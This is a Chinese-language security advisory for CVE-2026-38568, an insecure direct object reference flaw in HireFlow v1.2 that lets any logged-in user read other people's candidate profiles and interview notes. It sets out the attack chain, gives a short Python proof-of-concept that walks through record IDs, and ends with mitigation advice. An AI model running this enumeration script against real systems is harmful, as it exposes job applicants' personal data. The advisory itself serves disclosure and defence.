CVE-2026-38568 HireFlow访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2026-38568

漏洞类型

权限提升/访问控制

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HireFlow

漏洞概述

HireFlow v1.2版本存在严重的访问控制不当漏洞。由于应用程序在/candidate/<id>和/interview/<id>端点未实施对象级授权验证，任何经过身份验证的用户均可通过遍历URL路径中的整数ID，访问其他用户的候选人资料及面试记录。该漏洞导致横向权限提升，造成系统全量数据泄露。

技术细节

该漏洞属于典型的不安全的直接对象引用（IDOR）。HireFlow后端在处理/candidate/<id>和/interview/<id>请求时，直接从URL路径中提取记录ID并查询数据库，但未在代码逻辑中校验当前会话用户是否为该记录的所有者或拥有访问权限。攻击者仅需一个低权限账户，即可编写脚本自动化遍历ID（如从1递增），服务器会无条件返回所有敏感数据。这种缺陷绕过了基于角色的访问控制（RBAC）模型，严重破坏了数据的机密性和完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者注册或获取一个普通低权限账户，并分析应用API接口，发现/candidate/<id>和/interview/<id>端点。

STEP 2

2. 身份认证

攻击者使用低权限账户登录系统，获取有效的Session Cookie或Token。

STEP 3

3. 漏洞利用

攻击者编写脚本，使用认证凭据遍历URL中的ID参数（如1, 2, 3...），发送GET请求获取数据。

STEP 4

4. 数据泄露

服务器未校验所有权，直接返回所有候选人资料和面试笔记，导致全量敏感数据被窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Configuration target_url = "http://localhost:8000" login_endpoint = "/api/login" candidate_endpoint = "/candidate/{}" username = "[email protected]" password = "password123" # 1. Authenticate to get session session = requests.Session() login_payload = {"username": username, "password": password} response = session.post(target_url + login_endpoint, json=login_payload) if response.status_code == 200: print("[+] Login successful") # 2. Iterate through IDs to exploit IDOR for candidate_id in range(1, 100): vuln_url = target_url + candidate_endpoint.format(candidate_id) resp = session.get(vuln_url) if resp.status_code == 200 and "name" in resp.json(): print(f"[+] Found data for ID {candidate_id}: {resp.json()}") elif resp.status_code == 404: continue else: print(f"[-] ID {candidate_id} access denied or error") else: print("[-] Login failed")

影响范围

HireFlow 1.2

防御指南

临时缓解措施

建议立即升级到官方发布的最新安全版本。若无法立即升级，应在Web应用防火墙（WAF）中部署规则，检测针对敏感接口的高频序列化请求，并限制单用户对特定端点的访问频率。